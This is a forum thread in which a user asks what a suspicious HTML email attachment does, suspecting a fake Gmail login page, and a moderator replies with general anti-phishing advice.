Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

What is this malware designed to do ? (html and javascript)


  • Please log in to reply
1 reply to this topic

#1 Mharpes

Mharpes

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:02:43 AM

Posted 14 April 2017 - 10:46 AM

See this link:

https://drive.google.com/file/d/0B21NBE_QlXx3TTlaaUJrMGpvdVE/view?usp=sharing

It was sent to my mother in an email as an html attachment last night. I have changed the file extension from .html to .txt so it shouldn't present any danger. I have no knowledge of html syntax so I dont really know what it is trying to do but it looks like when you click on it intending to open the 'OUTSTANDING INVOICE' it will instead spawn a mockup of the gmail login page to trick you into entering your gmail account credentials which presumably get forwarded on to whoever wrote the malware. She opened it originally on her Android phone so it downloaded the html file rather than opening it and anyway she doesn't have a gmail account so I would be inclined to think that no harm was done. This morning however our internet connection was down, which is very unusual, and I had to power-cycle the modem/router to get it back. This may be a coincidence but it makes me wonder if the malware did something more. She did say that when she clicked on it originally on her phone, a dialog popped up asking for access to her contacts she thinks, (not clear if it was her phone contacts or the contacts in her email account) which she granted. Now this may just have been to forward the malware on to all her (phone/email) contacts which again wouldn't concern me overly.

To see it in action you can simply rename it from .txt to .html and click on it but obviously if it does more that steal gmail credentials this would not be advised.

 

So, is there anyone who knows html and javascript and can tell me for sure what this file is designed to do and whether or not our home network could be compromised?

Thanks,

 

M.

 



BC AdBot (Login to Remove)

 


#2 buddy215

buddy215

  • Moderator
  • 13,420 posts
  • ONLINE
  •  
  • Gender:Male
  • Location:West Tennessee
  • Local time:07:43 PM

Posted 15 April 2017 - 02:30 PM

Welcome to BC....

 

My guess it was a  criminal phishing email attempting to get CC number or other financial info since it mentioned outstanding invoice. Many different forms of this type of phishing.

 

I suggest resetting the phone to default....since access to email account and who knows what else was granted.

You should consider changing email address and cancel/ terminate/ delete the present email address.

 

A bit of advice...NEVER open an email unless you recognize the sender.

NEVER open an attachment unless you are 100% sure of what it contains.


“Every atom in your body came from a star that exploded and the atoms in your left hand probably came from a different star than your right hand. It really is the most poetic thing I know about physics...you are all stardust.”Lawrence M. Krauss
A 1792 U.S. penny, designed in part by Thomas Jefferson and George Washington, reads “Liberty Parent of Science & Industry.”




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users